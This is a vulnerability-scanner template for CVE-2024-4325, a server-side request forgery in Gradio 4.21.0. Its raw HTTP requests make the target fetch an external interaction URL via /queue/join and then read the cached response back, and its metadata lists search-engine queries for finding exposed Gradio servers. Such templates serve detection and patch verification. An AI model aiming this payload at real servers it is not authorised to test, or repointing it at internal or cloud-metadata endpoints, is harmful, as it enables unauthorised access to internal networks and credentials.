id: CVE-2024-4325

info:
  name: Gradio - Server-Side Request Forgery
  author: iamnoooob,pdresearch
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in the gradio-app/gradio version 4.21.0, specifically within the `/queue/join` endpoint and the `save_url_to_cache` function. The vulnerability arises when the `path` value, obtained from the user and expected to be a URL, is used to make an HTTP request without sufficient validation checks. This flaw allows an attacker to send crafted requests that could lead to unauthorized access to the local network or the AWS metadata endpoint, thereby compromising the security of internal servers.
  impact: |
    Unauthenticated attackers can force the server to make arbitrary requests via SSRF, potentially accessing internal services and cloud metadata endpoints.
  remediation: |
    Update Gradio to a version later than 4.21.0 that patches the SSRF vulnerability.
  reference:
    - https://github.com/advisories/GHSA-973g-55hp-3frw
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4325
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2024-4325
    cwe-id: CWE-918
    epss-score: 0.65093
    epss-percentile: 0.98497
    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gradio_project
    product: gradio
    framework: python
    shodan-query:
      - http.html:"__gradio_mode__"
      - http.title:"gradio"
    fofa-query:
      - body="__gradio_mode__"
      - title="gradio"
    google-query: intitle:"gradio"
  tags: cve,cve2024,gradio,ssrf,cloud,oast,vkev,vuln

flow: http(1) && http(2)

variables:
  oast: "http://oast.fun"
  h_oast: "{{sha1(oast)}}"

http:
  - raw:
      - |
        POST /queue/join? HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "data": [
                [
                    {
                        "meta": {
                            "_type": "gradio.FileData"
                        },
                        "path": "{{oast}}",
                        "url": "http://127.0.0.1:7860/file=/tmp/gradio/d1be868eeb62e5194df165ccd8becbc5b3ffb299/favicon.ico",
                        "orig_name": "favicon.ico",
                        "size": 15406,
                        "mime_type": "image/x-icon"
                    }
                ]
            ],
            "event_data": null,
            "fn_index": 0,
            "trigger_id": 2,
            "session_hash": "l8v6ku4cm8d"
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(body, "event_id")'
        condition: and
        internal: true

  - raw:
      - |
        GET /file=/tmp/gradio/{{h_oast}}/oast.fun HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"
          - "/projectdiscovery/interactsh"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e8fd12c12805d2019175d29897af3977aca91bed5f3778bf672b4ab885495ad80220119b6c78b5f663073282f5889a40ff6fcc207bb2a7e38e6109bdc29cd642e4d0:922c64590222798bb761d5b6d8e72950